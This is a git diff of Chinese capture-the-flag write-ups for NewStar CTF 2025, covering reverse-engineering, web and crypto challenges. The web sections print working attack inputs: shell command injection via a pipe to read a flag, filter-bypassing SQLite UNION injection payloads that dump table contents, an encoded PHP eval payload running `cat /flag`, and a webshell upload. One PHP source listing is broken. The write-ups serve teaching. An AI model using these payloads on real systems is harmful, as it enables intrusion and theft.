+是一个凯撒密码的变体: + +1. 如果字符是数字,那么反转其在 0~9 之间的顺序(也就是 `0x69-C`),0 ↔ 9,1 ↔ 8,... + +2. 如果是字母,反转其在字母表中的顺序并切换大小写(也就是 `0xBB-C`),A ↔ z,b ↔ Y,... + +而主函数后面逻辑中的 `IsDebuggerPresent` 函数是**反调试**函数,当存在调试器时返回真,否则为假。 + +由于题目正常运行时肯定不存在调试器,所以这里一定会按假的分支走(也就是异或 `0x3C`),接下来动态调试,在 `std::string::string((std::string *)v11);` 这一行下断点,提取前面的密文`69736668474A09747E63550A790A75546A636A09547E636A5164757E777B04057141`。 + +在 cyberchef fromhex 后异或 `0x3C` 后得到 `UOZT{v5HB_i6E6IhV_V5hB_VmXIBKG89M}`,然后编写一个简单的 python 脚本即可恢复 flag: + +```python +def func(s: str) -> str: + result = [] + for c in s: + if '0' <= c <= '9': + transformed = chr(ord('9') - (ord(c) - ord('0'))) + result.append(transformed) + elif c.isalpha(): + transformed = chr(0xBB - ord(c)) + result.append(transformed) + else: + result.append(c) + return ''.join(result) + +original = "UOZT{v5HB_i6E6IhV_V5hB_VmXIBKG89M}" +dec = func(original) +print(dec) +``` + +flag 为:`flag{E4sy_R3v3rSe_e4Sy_eNcrypt10n}`。 diff --git a/docs/wp/2025/week2/web/dd-accelerator.md b/docs/wp/2025/week2/web/dd-accelerator.md new file mode 100644 index 0000000..8b98b91 --- /dev/null +++ b/docs/wp/2025/week2/web/dd-accelerator.md @@ -0,0 +1,81 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + + + +# DD 加速器 + + + +本题考查命令拼接注入的 RCE 利用。 + + +打开题目,我们得到这样一个页面。 + +![dd-accelerator_1](/assets/images/wp/2025/week2/dd-accelerator_1.png) +![dd-accelerator_2](/assets/images/wp/2025/week2/dd-accelerator_2.png) + +点击开始,可以看到系统 ping 命令产生的输出。我们可以猜测,这个功能就是将用户输入拼接,执行了类似下面的**系统命令**实现的。 + +```bash +ping -c 1 127.0.0.1 +``` + +那么,我们想要攻入这台服务器,获取 flag,就得找办法一行执行多个命令。 + +## 介绍一下 `|` 和 `&`: + +### `|` — 管道(pipe) + +作用:**把左边命令的标准输出(stdout)连接到右边命令的标准输入(stdin)。** + +### `&` — 后台运行符(ampersand) + +作用:把命令放到**后台执行**,shell 立即返回提示符,继续执行后面的命令或接受输入。 + +### 还有两个逻辑处理 + +```bash +cmd1 && cmd2 # cmd1 成功 (exit 0) 时才执行 cmd2 +cmd1 || cmd2 # cmd1 失败时执行 cmd2 +``` + +这些都可以让一行执行多个命令。 + +回到这题来: +我们的输入填在了 IP 的位置,也就是说可以往后添加一个管道符 `|`,就能注入命令了。 + +```bash +ping -c 1 127.0.0.1 | ls +``` + +> 这题的非预期是用 `env`,出题人失误忘记清环境变量了 + +这题的 flag 存在于一个隐藏文件夹。所以我们要用 `ls -la <路径>` 的方式查看。 + +![dd-accelerator_3](/assets/images/wp/2025/week2/dd-accelerator_3.png) + +尝试 `cat`:限制了长度。那该怎么办呢?这个时候就该用通配符 `*` 了。 + +通配符是 **shell 用来匹配文件名的特殊符号**。 + +当你输入一个命令(如 ls \*.txt )时,shell 在执行命令之前会先展开通配符,把它替换成所有匹配的文件名,再把结果传给命令。 + +例如: + +```sh +ls *.txt +``` + +→ Shell 会自动展开成:(假设存在 a.txt b.txt notes.txt) + +```sh +ls a.txt b.txt notes.txt +``` + +然后执行这个命令。 + +所以我们只需要 `cat .<首字母>*/flag` 就能读取到 flag 了。 diff --git a/docs/wp/2025/week2/web/e-admin-system.md b/docs/wp/2025/week2/web/e-admin-system.md new file mode 100644 index 0000000..0124c3d --- /dev/null +++ b/docs/wp/2025/week2/web/e-admin-system.md @@ -0,0 +1,125 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + + + +# 小 E 的管理系统 + + + +本题考查基本的 SQL 注入绕过。 + + +SQL 注入(SQL Injection)是一种常见的网络攻击手段,攻击者通过在输入字段或请求中注入恶意的 SQL 语句,操控数据库执行意图之外的操作。 + +此处由于使用了 SQL 语句拼接,导致了可以被 SQL 注入。 + +## fuzz + +由于题目没有给源码,不知道具体过滤方式,需要 fuzz(模糊测试) 一下 + +发现过滤了 `['#', '--', ';',' ',"'",'"','=','/']` + +以及部分函数 `/(char|hex|ascii|substr|substring|mid)\s*\(/i` + +## union + +对空格的过滤可以用换行符绕过,URL 编码就是 `%0a`。等号可以用 LIKE 绕过 + +虽然过滤了 `#` 和 `--`,但是测试发现不需要注释掉末尾语句,猜测拼接在 sql 语句最后 + +过滤了 `'` 和 `"`,但是测试可以发现闭合语句不需要引号 + +过滤了 `;` 所以不能堆叠注入 + +最终考虑使用 UNION 联合注入(通过 UNION 将攻击者构造的查询结果与合法查询结果合并,从而获取敏感数据) + +## 行数 + +UNION 联合注入要求 union 的语句输出的行数与原本语句输出的行数一致,正常情况需要用逗号测试出行数 + +```sql +UNION SELECT 1,2 +``` + +但是这里过滤了逗号,需要用 JOIN 来绕过 + +```sql +UNION SELECT * FROM (SELECT 1) JOIN (SELECT 2) +``` + +将空格替换为 `%0a`,逐一测试,当正常返回代表行数正确,最终测试出行数为 5 行 + +```sql +1%0aUNION%0aSELECT*FROM%0a(SELECT%0a1)JOIN(SELECT%0a2)JOIN(SELECT%0a3)JOIN(SELECT%0a4)JOIN(SELECT%0a5) +-- 1 UNION SELECT * FROM (SELECT 1)JOIN(SELECT 2)JOIN(SELECT 3)JOIN(SELECT 4)JOIN(SELECT 5) +``` + +## 表 + +测试出行数后,需要挑选一行替换为我们需要查询的语句 + +我们需要先查询有哪些表。正常 SQL 查看有哪些表可以用 + +```sql +SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema LIKE database() +``` + +编码后发送 + +```sql +1%0AUNION%0ASELECT*FROM%0A(SELECT%0A1)JOIN(SELECT%0AGROUP_CONCAT(table_name)%0AFROM%0Ainformation_schema.tables%0AWHERE%0Atable_schema%0ALIKE%0Adatabase())JOIN(SELECT%0A3)JOIN(SELECT%0A4)JOIN(SELECT%0A5) +``` + +但是返回 `{"error":"database error: Unable to prepare statement: 1, no such table: information_schema.tables"}`,可以推测是 sqlite 数据库。查询 SQLite 的系统表 `sqlite_master` 即可 + +```sql +1%0aUNION%0aSELECT*FROM%0a(SELECT%0a1)JOIN(SELECT%0aGROUP_CONCAT(name)%0aFROM%0asqlite_master)JOIN(SELECT%0a3)JOIN(SELECT%0a4)JOIN(SELECT%0a5) +``` + +成功返回 + +```json +{ + "id": 1, + "cpu": "node_status,sys_config,sqlite_autoindex_sys_config_1,sqlite_sequence", + "ram": 3, + "status": 4, + "lastChecked": 5 +} +``` + +## 表结构 + +查看表结构 + +```sql +1%0aUNION%0aSELECT*FROM%0a(SELECT%0a1)JOIN(SELECT%0aGROUP_CONCAT(sql)%0aFROM%0asqlite_master)JOIN(SELECT%0a3)JOIN(SELECT%0a4)JOIN(SELECT%0a5) +``` + +返回 + +```json +{ + "id": 1, + "cpu": "CREATE TABLE node_status (\n node_id INTEGER PRIMARY KEY,\n cpu_usage VARCHAR(10),\n ram_usage VARCHAR(10),\n status VARCHAR(15) CHECK(status IN ('Online','Offline','Maintenance')),\n last_checked DATETIME DEFAULT CURRENT_TIMESTAMP\n),CREATE TABLE sys_config (\n id INTEGER PRIMARY KEY AUTOINCREMENT,\n config_key VARCHAR(50) UNIQUE,\n config_value TEXT\n),CREATE TABLE sqlite_sequence(name,seq)", + "ram": 3, + "status": 4, + "lastChecked": 5 +} +``` + +可以看到 sys_config 中有 config_key 以及 config_value + +## flag + +查看 config_value + +```sql +1%0aUNION%0aSELECT*FROM%0a(SELECT%0a1)JOIN(SELECT%0aGROUP_CONCAT(config_value)%0aFROM%0asys_config)JOIN(SELECT%0a3)JOIN(SELECT%0a4)JOIN(SELECT%0a5) +``` + +即可获取 flag diff --git a/docs/wp/2025/week2/web/orange-snack.md b/docs/wp/2025/week2/web/orange-snack.md new file mode 100644 index 0000000..f28eec3 --- /dev/null +++ b/docs/wp/2025/week2/web/orange-snack.md @@ -0,0 +1,195 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + + + +# 搞点哦润吉吃吃🍊 + + + +本题考查基本的 Web 自动化脚本编写。 + + +> [!INFO] +> 本来是想通过社会工程学密码生成器生成弱密码爆破登录,但是觉得有点偏题了,干脆直奔考点吧整体其实就是 Python 脚本的编写,如果部分同学有爬虫的基础,那这道题只能是轻轻又松松建议提前了解知识点:HTTP 协议包括请求及响应基本格式内容(Week1 中你们已经学习)、Python 的基本语法和 requests 库基本用法、正则表达式模块当然如果你喜欢用别的代码语言或模块,请随意 + +## 收集信息 + +F12 查看提示 + +```html + +``` + +登录后,让我们计算 token。 + +![网页提示](/assets/images/wp/2025/week2/orange-snack_1.png) + +且每次 token 表达式是不一样的,显然 3s 内想要计算再填入验证框中是很困难的;届时如果能利用代码脚本帮助我们自动化整个过程,这一定是能够完成的。 + +在此之前,你需要了解 [requests 模块](https://www.runoob.com/python3/python-requests.html) 的基本用法,其主要用于发送 HTTP 请求,处理网络通信与 Web 服务器进行数据交互。 + +在我们的 web 网页中,一些动态数据是通过特定的路由来传递数据,我们需要清楚各个路由的作用,以此构建脚本内容,显然 Doro 给了我们提示。(从后面的解题情况来看,这个提示多此一举了) + +## 编写解题脚本 + +假设你已经掌握了 Week1 学习的 HTTP 协议相关知识,那么服务器验证每个用户的登录凭据就是叫 Cookie🍪 的东西,我们抓个包来看看。 + +![登录后的 Cookie](/assets/images/wp/2025/week2/orange-snack_2.png) + +要想在请求 `/home` 路由后得到登录后的页面,你需要加上这个 Cookie + +```python +@app.route('/home') +def home(): + if 'logged_in' not in session or not session['logged_in']: + flash('请先登录!', 'error') + return redirect(url_for('login')) +``` + +可以看到后端代码会从你的 session 中检查 `logged_in` 字段 + +现在你想知道表达式的路由,点击开始验证后抓包 + +![开始验证接口请求](/assets/images/wp/2025/week2/orange-snack_3.png) + +验证路由 + +![验证 token 接口请求](/assets/images/wp/2025/week2/orange-snack_4.png) + +如果你尝试过直接通过路由传输数据,那么服务器会显示“未登录”,这是因为每个路由都经过鉴权处理,确保这些操作是授权了的 + +```python +@app.route('/start_challenge', methods=['POST']) +def start_challenge(): + if 'logged_in' not in session or not session['logged_in']: + return jsonify({'error': '请先登录'}), 401 + +@app.route('/verify_token', methods=['POST']) +def verify_token(): + if 'logged_in' not in session or not session['logged_in']: + return jsonify({'error': '请先登录'}), 401 +``` + +所以,现在你有一个构建脚本的清晰思路,拿到已登录的 Cookie,请求 `/start_challenge` 拿到数据,计算后,再将数据传递给 `/verify_token` 用于验证。 + +不过在这中间依旧有些细节需要我们注意 + +--- + +![JSON 响应和 Set-Cookie](/assets/images/wp/2025/week2/orange-snack_5.png) + +`Content-Type: application/json`:表示传输的数据格式是 JSON,从后面的相应也可以看出 + +`Set-Cookie`:用于在客户端(浏览器)设置 Cookie,通过提示可以发现设置的新 Cookie 里包含了以下这些参数,这是用于验证的,而我们需要从 json 中获取(`\u` 开头的字符串是 Unicode 编码) + +因此我们提交数据时,记得带上这两个字段;现在打印这个相应可以看到 + +```json +{ + "expression": "token = (1761560023 * 38196) ^ 0xfd1d72", + "hint": "doro\u8bb0\u5f97\u8fd9\u91cc\u4f1a\u5728session\u91cc\u9762\u6dfb\u52a0\u9a8c\u8bc1\u53c2\u6570, \u4e5f\u8bb8Set-Cookie\u53ef\u4ee5\u5e2e\u52a9\u6211\u4eec......", + "multiplier": 38196, + "xor_value": "0xfd1d72" +} +``` + +time 时间戳是在表达式中的,我们需要提取出来,这里需要用到 [正则表达式](https://docs.python.org/zh-cn/3.13/howto/regex.html) + +> [!INFO] +> 简单来说,正则表达式可以匹配或者操作一段文本,通过特定的规则匹配我们想要处理或者过滤的字段,这在 CTF 的方方面面都会遇到 + +具体语法这里不过多赘述,简言之我们要获取 `1761560023`,这是数字字符,我们可以使用 `\d+` 来匹配,这里我们只需要提取遇到的第一个数字即可,因此不需要贪婪模式匹配 + +```python +time = re.search(r'\d+', expression).group() +``` + +因此整体雏形大概是 + +```python +import requests +import re + +URL_start = 'http://localhost:5000/start_challenge' +URL_verify = 'http://localhost:5000/verify_token' +Cookie = 'session=eyJsb2dnZWRfaW4iOnRydWUsInVzZXJuYW1lIjoiRG9ybyJ9.aJBpgQ.3rK8tY4f360AArm8qXHD-dicCsU' + +res_start = requests.post(url=URL_start, headers={'Content-Type': 'application/json', 'Cookie': Cookie}) +new_cookie = res_start.headers['Set-Cookie'] +multiplier = res_start.json()['multiplier'] +xor_value = res_start.json()['xor_value'] +expression = res_start.json()['expression'] +time = re.search(r'\d+', expression).group() + +result = (int(time) * multiplier) ^ int(xor_value, 16) + +res_verify = requests.post(url=URL_verify, headers={'Content-Type': 'application/json', 'Cookie': new_cookie}, json={"token": result}) +print(res_verify.text) +``` + +不过光是这样会返回 + +![缺少 User-Agent 的响应](/assets/images/wp/2025/week2/orange-snack_6.png) + +是的,依旧需要用到 Week1 学习的 HTTP 协议知识,看到这个提示,你应该想到 `User-Agent` + +> [!INFO] +> User-Agent 一般用于标识客户端类型,例如:浏览器类型(Chrome、Firefox、Safari 等)、操作系统(Windows、macOS、Linux 等)以及设备类型(桌面、移动设备等)。服务器根据 User-Agent 返回不同的内容,可以为移动设备返回移动版页面,或者为不同浏览器提供兼容性处理。如果我们不添加 UA 头,那么默认就是: + +![requests 默认 User-Agent](/assets/images/wp/2025/week2/orange-snack_7.png) + +所以最终脚本如下: + +```python +import requests +import re + +URL_start = 'http://localhost:5000/start_challenge' +URL_verify = 'http://localhost:5000/verify_token' +Cookie = 'session=eyJsb2dnZWRfaW4iOnRydWUsInVzZXJuYW1lIjoiRG9ybyJ9.aJBpgQ.3rK8tY4f360AArm8qXHD-dicCsU' +UA = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36' + +res_start = requests.post(url=URL_start, headers={'Content-Type': 'application/json', 'Cookie': Cookie, 'User-Agent': UA}) +new_cookie = res_start.headers['Set-Cookie'] +multiplier = res_start.json()['multiplier'] +xor_value = res_start.json()['xor_value'] +expression = res_start.json()['expression'] +time = re.search(r'\d+', expression).group() + +result = (int(time) * multiplier) ^ int(xor_value, 16) + +res_verify = requests.post(url=URL_verify, headers={'Content-Type': 'application/json', 'Cookie': new_cookie, 'User-Agent': UA}, json={"token": result}) +print(res_verify.text) +``` + +事实上,你也可以使用 requests 库中的 Session 来进行管理会话,并且直接使用 eval 函数对相关表达式进行计算。 + +```python +import requests + +domain = "https://domain.com/" + +url_login = domain + "login" +url_start = domain + "start_challenge" +url_verify = domain + "verify_token" + +s = requests.Session() +s.headers.update({ + 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36' +}) + +res_login = s.post(url=url_login, data={"username": "Doro", "password": "Doro_nJlPVs_@123"}) + +res_start = s.post(url=url_start) +expression = res_start.json().get('expression').split('=')[1].strip() +result = eval(expression) + +res_verify = s.post(url=url_verify, json={"token": result}) +print(res_verify.text) +``` + +以上脚本是一个从登录到攻击的全过程脚本,只需要更新 `domain` 的值即可自动获取 FLAG。 diff --git a/docs/wp/2025/week2/web/real-checkin.md b/docs/wp/2025/week2/web/real-checkin.md new file mode 100644 index 0000000..96f9af6 --- /dev/null +++ b/docs/wp/2025/week2/web/real-checkin.md @@ -0,0 +1,76 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + + + +# 真的是签到诶 + + + +本题考查编码绕过。 + + +题目直接给出了源码。 + +```php +" . $answer . "
"; +echo $res . $res . $res . $res . $res; + +?> +``` + +在本题中,你需要传入一个 POST 参数 `cipher`。绕过一系列的行为之后,执行恶意的 `eval` 语句。作为出现在 week2 的签到题,在本题中你只需要阅读清楚代码逻辑即可。 + +整体编码逻辑中,我们的输入会经过如下步骤: + +1. `base64_decode`:base64 解码; +2. `atbash`:埃特巴什密码转化,可以直接在 CyberChef 中搜 `atbash` 就能找到了; +3. `str_replace(' ', '')`:将所有的空格删除掉; +4. `str_rot13`:rot13 转换。 + +根据以上的逻辑,我们能够给出一个逆向的逻辑。 + +![cyberchef](/assets/images/wp/2025/week2/real-checkin_1.png) + +1. 先 rot13 转换; +2. 再用 `\t` 来替换掉空格; +3. 再进行 atbash 密码转换; +4. 最后再使用 base64 编码。 + +然后在 input 处输入 `system("cat /flag");`,再在 POST body 中传入 `cipher=dW91dGlhKCJrbXQJL2hibWciKTs=` 即可。 diff --git a/docs/wp/2025/week2/web/white-k-1.md b/docs/wp/2025/week2/web/white-k-1.md new file mode 100644 index 0000000..757d7b5 --- /dev/null +++ b/docs/wp/2025/week2/web/white-k-1.md @@ -0,0 +1,42 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + + + +# 白帽小 K 的挑战(1) + + + +本题考查信息泄露和文件上传漏洞。 + + +本题提供了一个看似非常像音乐播放器的内容,但是我们可以上传属于自己的音乐。 + +你可以使用 Wappalyzer 插件来查看本网页使用的服务类型, + +![Wappalyzer 识别服务类型](/assets/images/wp/2025/week2/white-k-1_1.png) + +通过前端的分析可以得到一个隐藏的接口,这个接口并没有在网页中有实际作用,但是在后端应该是实现了这个接口的,我们可以访问这个接口看看。 + +![前端隐藏接口](/assets/images/wp/2025/week2/white-k-1_2.png) + +我们可以尝试访问这里的网页,或者直接在控制台中调用这个 `fetchload` 函数试试。 + +![控制台调用 fetchload](/assets/images/wp/2025/week2/white-k-1_3.png) + +这里发现 load 下来的内容使用某种方法进行进行解析,我们可以直接使用抓包工具进行访问。 + +这里我们可以上传一个一句话木马文件上去试试。 + +![上传一句话木马](/assets/images/wp/2025/week2/white-k-1_4.png) + +然后用 `onload` 接口进行访问。 + +![onload 接口命令执行](/assets/images/wp/2025/week2/white-k-1_5.png) + +成功进行命令执行了。然后就是正常的远程 RCE 执行,我们直接 `cat /flag` 就行了。 + +事实上,这道题目的后端中,使用了 `include` 来执行 php 代码,并且将执行结果返回。在更远的未来,你会见到很多有关 php 的上传恶意文件后加载恶意文件进行 RCE 的操作。 diff --git a/docs/wp/2025/week3/crypto/cbc-dance.md b/docs/wp/2025/week3/crypto/cbc-dance.md new file mode 100644 index 0000000..1f7683c --- /dev/null +++ b/docs/wp/2025/week3/crypto/cbc-dance.md @@ -0,0 +1,94 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + +# CBC 之舞 + +这道题是一个基于 AES-CBC 模式的加密题目,CBC 是「密码块链接」模式。 + +其特点是:每个明文块在加密前会先与前一个密文块进行异或(XOR),第一个块则与初始化向量(IV)进行异或。如果密文块顺序被打乱,解密时会导致明文块错位,从而可能泄露信息。 + +我们已知以下数据: + +```plaintext +IV1 (hex): 1e5d251ea78ef68a1282079fd028c747 +IV2 (hex): 18777ae4c1a29f4c5db8ba6c5dfe72f1 +m1 (hex): f560fd28ed5c5ce7d952eb44b47007e702f42dbb54540dfc78467f48933dbb01ebcf520fd3d23a211d3b4e8c06261966cb178525c25b8058ff792e0f251d3d15 +c1 (hex): caf7bc1223c17f848aec854a87b8958d4c518f7287663bfae0b6a5a1e0f0eb95b50c9ea6789a7d77fda5f50d1b8a2183b40cab693ebacf32a9b59faf3b0084ff +c2 (hex): b40cab693ebacf32a9b59faf3b0084ffcaf7bc1223c17f848aec854a87b8958db50c9ea6789a7d77fda5f50d1b8a21834c518f7287663bfae0b6a5a1e0f0eb95 +``` + +值得注意的是,`c1` 是 `c2` 的四个块经过某种置换(permutation)后得到的。 + +相关代码如下: + +```python +perm = [1, 2, 3, 0] +random.shuffle(perm) +while any(i == perm[i] for i in range(4)): + random.shuffle(perm) +``` + +观察后不难发现: + +```python +c1[0] = c2[3] +c1[1] = c2[0] +c1[2] = c2[2] +c1[3] = c2[1] +``` + +即 `perm = [3, 0, 2, 1]`。 + +CBC 模式中的解密过程为: + +```plaintext +P_i = Decrypt(C_i) XOR C_{i-1} +``` + +利用 CBC 的解密公式,可以建立 `m1` 与 `c1`、`c2` 之间的关系,从而还原 `m2` 的内容。 + +核心解密公式如下: + +```plaintext +m2[i] = AES_Decrypt(c2[i]) XOR c2[i-1] +``` + +而 `AES_Decrypt(c2[i])` 实际上可以表示为 `m1[j] XOR c1[k]` 的形式,通过置换关系可以一一对应。 + +最终推导出四个 m2 块: + +```python +m20 = xor(xor(m1[3], c1[2]), IV2) +m21 = xor(xor(IV1, m1[0]), c2[0]) +m22 = xor(xor(c1[1], m1[2]), c2[2]) +m23 = xor(xor(c1[0], m1[1]), c2[1]) +``` + +完整 EXP: + +```python +from Crypto.Cipher import AES +from Crypto.Util.Padding import pad +from Crypto.Util.number import* +import os +from pwn import xor + +IV1 =0x1e5d251ea78ef68a1282079fd028c747 +IV2 =0x18777ae4c1a29f4c5db8ba6c5dfe72f1 +m1 =0xf560fd28ed5c5ce7d952eb44b47007e702f42dbb54540dfc78467f48933dbb01ebcf520fd3d23a211d3b4e8c06261966cb178525c25b8058ff792e0f251d3d15 +c1 =0xcaf7bc1223c17f848aec854a87b8958d4c518f7287663bfae0b6a5a1e0f0eb95b50c9ea6789a7d77fda5f50d1b8a2183b40cab693ebacf32a9b59faf3b0084ff +c2 =0xb40cab693ebacf32a9b59faf3b0084ffcaf7bc1223c17f848aec854a87b8958db50c9ea6789a7d77fda5f50d1b8a21834c518f7287663bfae0b6a5a1e0f0eb95 + +IV1=long_to_bytes(IV1) +IV2=long_to_bytes(IV2) +m1=long_to_bytes(m1) +c1=long_to_bytes(c1) +c2=long_to_bytes(c2) + +m20=xor(xor((m1[-16:]),c1[-32:-16]),IV2) +m21=xor(xor(IV1,m1[:16]),c2[:16]) +m22=xor(xor(c1[16:32],m1[-32:-16]),c2[16:32]) +m23=xor(xor(c1[:16],m1[16:32]),c2[-32:-16]) +print(m20,m21,m22,m23) +``` diff --git a/docs/wp/2025/week3/crypto/gcl.md b/docs/wp/2025/week3/crypto/gcl.md new file mode 100644 index 0000000..b3001ec --- /dev/null +++ b/docs/wp/2025/week3/crypto/gcl.md @@ -0,0 +1,36 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + + + +# GCL + + + +本题考查 LCG 相关分析。 + + +FLAG 转数字得到 `m`。 +素数$p$,两随机数$a,b$,序列 $\{s_n\}$ 满足关系:$$s_{n}=as^{-1}_{n-1}+b\;\pmod{p}$$ +`gift` 给了连续 10 项 `s`,我们需要求出下一项作为 key 解密 `c=m^key` + +和 LCG 类似,我们肯定要先求出 $p$ 出来。 + +$$ +\begin{align}s_{i}&=as^{-1}_{i-1}+b\;\pmod{p}\\ +s_is_{i-1}&=a+bs_{i-1}\pmod p\;\;(消掉模逆)\\ +s_{i+1}s_i&=a+bs_i\pmod p\;\;(再写一项)\\ +s_{i+1}s_i-s_is_{i-1}&=b(s_i - s_{i-1})\pmod p\;\;(消掉 a)\\ +s_i(s_{i+1} - s_{i-1})&=b(s_i - s_{i-1})\pmod p\;\;(整理一下)\\ +s_{i+1} * (s_{i+2} - s_i) &= b(s_{i+1} - s_i) \pmod p\;\;(再写一项)\\ +\end{align} +$$ + +交叉相乘把 $b$ 消掉: + +$$s_i(s_{i+1} - s_{i-1})(s_{i+1} - s_i) - s_{i+1}(s_{i+2} - s_i)(s_i - s_{i-1}) = 0 \pmod p$$ + +求 GCD 可以求出 $p$ (也可能是倍数),之后也可以求出 $b,a$ diff --git a/docs/wp/2025/week3/crypto/leaked-primes.md b/docs/wp/2025/week3/crypto/leaked-primes.md new file mode 100644 index 0000000..d392b6e --- /dev/null +++ b/docs/wp/2025/week3/crypto/leaked-primes.md @@ -0,0 +1,216 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + +# 被泄露的素数 + +这是一道结合 RSA 加密和 Coppersmith 攻击的题目。 + +加密脚本中关于 `p` 的处理如下: + +```python +p_bits = int(p).bit_length() # p 的位数,应该是 1024 +high_bit_count = int(p_bits * 2/3) # 取 p 的高 2/3 位,约 682 位 +p_high = p >> (p_bits - high_bit_count) # 右移得到高 682 位 + +mask = (1 << (high_bit_count - '?')) - 1 # 这里 '?' 是一个未知数 +p_high_masked = p_high & mask # 用掩码隐藏一部分高位 +``` + +通过位数估计可以发现,`?` 掩码隐藏的高位数量不多,仍在可爆破范围内。 + +对于泄露高位的 `p`,主要使用 Coppersmith 方法求解。 + +Coppersmith 方法是用来求解模方程小根的一种算法。 + +在这里,我们已知 p 的高位,未知低位,可以设: + +```python +p = p0 + x +``` + +其中 p0 是已知的高位部分,x 是未知的低位部分(小于 2^342)。 + +因为 n = p \* q,所以: + +```plaintext +f(x) = p0 + x 是 n 的一个小因子 +``` + +Coppersmith 可以在模 n 下找到这样的小根 x。 + +在 SageMath 的 `small_roots()` 方法中,主要有两个重要参数: + +1. `X`:根的上界 + +```python +roots = f.small_roots(X=2^342, beta=0.44) +``` + +`X` 表示预期根的最大绝对值。 + +在我们的题目中:p 是 1024 位,已知 p 的高 682 位,所以未知的低位部分有:1024 \- 682 = 342 位,因此 x < 2^342,所以设置 X = 2^342。 + +设置技巧:如果 X 设得太小,可能找不到真正的根,如果 X 设得太大,计算会变慢甚至失败,一般根据未知的位数来设置:X = 2^\(未知位数\)。 + +2. `beta`:因子的相关大小 + +`beta` 表示所求因子与模数的比例关系。在 RSA 中,`n = p × q`。通常 `p` 和 `q` 大小相近,约为 `sqrt(n)`,因此 `p ≈ n^0.5`,对应 `beta ≈ 0.5`。 + +为什么这里用 0\.44 而不是 0\.5? + +理论上,如果 `p` 和 `q` 完全等长,可以使用 `beta = 0.5`。但实际题目中二者可能不完全相等,因此通常将该值略微调低,例如 `0.48`、`0.45` 或 `0.44`。如果 `0.5` 无法得到根,可以逐步尝试更小的经验值。 + +完整 EXP: + +```python +from Crypto.Util.number import * +from sage.all import* + +## 读取公钥文件 +def read_public_key(filename): + with open(filename, 'r') as f: + content = f.read().strip() + + n = None + e = None + + # 处理不同的公钥格式 + if 'n = ' in content and 'e = ' in content: + # 格式: n = 0x... e = 0x... + n_str = content.split('n = ')[1].split()[0] + e_str = content.split('e = ')[1].split()[0] + + # 处理十六进制或十进制 + if n_str.startswith('0x'): + n = int(n_str, 16) + else: + n = int(n_str) + + if e_str.startswith('0x'): + e = int(e_str, 16) + else: + e = int(e_str) + + elif '-----BEGIN PUBLIC key-----' in content: + # PEM 格式的公钥(需要解析) + from Crypto.PublicKey import RSA + key = RSA.import_key(content) + n = key.n + e = key.e + else: + # 尝试直接解析为数字 + lines = content.split('\n') + for line in lines: + if '=' in line: + key, value = line.split('=', 1) + key = key.strip() + value = value.strip() + if key == 'n': + if value.startswith('0x'): + n = int(value, 16) + else: + n = int(value) + elif key == 'e': + if value.startswith('0x'): + e = int(value, 16) + else: + e = int(value) + + return n, e + +## 读取 partial_p.txt +def read_partial_p(filename): + with open(filename, 'r') as f: + content = f.read().strip() + + # 处理???开头的格式 + if content.startswith('???'): + hex_str = content[3:] # 去掉前 3 个字符"???" + # 去除可能存在的空格或其他分隔符 + hex_str = hex_str.replace(' ', '').replace(':', '') + base_val = int(hex_str, 16) + return base_val, hex_str + else: + # 如果没有???,直接解析为数字 + if content.startswith('0x'): + return int(content, 16), content[2:] + else: + return int(content), content + +## 读取密文文件 +def read_ciphertext(filename): + with open(filename, 'rb') as f: + ciphertext_bytes = f.read() + + # 尝试判断是原始字节还是编码后的 + try: + # 如果是十六进制编码的 + if len(ciphertext_bytes) > 2 and ciphertext_bytes[:2] == b'0x': + return int(ciphertext_bytes[2:].decode(), 16) + # 如果是 Base64 编码的 + elif b'BEGIN' in ciphertext_bytes or b'BASE64' in ciphertext_bytes: + from base64 import b64decode + return bytes_to_long(b64decode(ciphertext_bytes)) + else: + # 直接作为字节处理 + return bytes_to_long(ciphertext_bytes) + except: + # 如果解析失败,直接返回字节的整数形式 + return bytes_to_long(ciphertext_bytes) + +## 主读取函数 +def read_challenge_files(): + try: + # 读取公钥 + n, e = read_public_key('public_key.pem') + print(f"读取到 n: {n}") + print(f"读取到 e: {e}") + print(f"n 的位数: {n.bit_length()}") + + # 读取部分 p + base_val, hex_str = read_partial_p('partial_p.txt') + print(f"读取到部分 p: ???{hex_str}") + print(f"基础值: {hex(base_val)}") + print(f"基础值位数: {base_val.bit_length()}") + + # 读取密文 + c = read_ciphertext('ciphertext.bin') + print(f"读取到密文: {hex(c)}") + print(f"密文长度: {c.bit_length()} 位") + + return n, e, base_val, c + + except FileNotFoundError as e: + print(f"文件未找到: {e}") + return None, None, None, None + except Exception as e: + print(f"读取文件时出错: {e}") + return None, None, None, None + +n, e, base_val, c = read_challenge_files() +def solve(): + n,e,base_val,c=read_challenge_files() + for msb in range(0,8): + full_high=(msb<<(682-3))| base_val + p0=full_high<<342 + print(p0.bit_length()) + + PR.=PolynomialRing(Zmod(n)) + f=p0+x + roots=f.small_roots(X=2^342,beta=0.44) + print(roots,msb) +solve() +full_high=(6<<682-3)| base_val +p0=full_high<<342 +print(p0.bit_length()) + +f=p0+3807104160372250427408151115969004938011834030077750047641248496672420141594744130350935075551156863041 + +from gmpy2 import* +q=n//f +phi=(f-1)*(q-1) +d=invert(e,phi) +m=pow(c,d,n) +long_to_bytes(int(m)) +``` diff --git a/docs/wp/2025/week3/crypto/lucky-birthday.md b/docs/wp/2025/week3/crypto/lucky-birthday.md new file mode 100644 index 0000000..5342ac1 --- /dev/null +++ b/docs/wp/2025/week3/crypto/lucky-birthday.md @@ -0,0 +1,47 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + + + +# 欧皇的生日 + + + +本题考查生日攻击。 + + 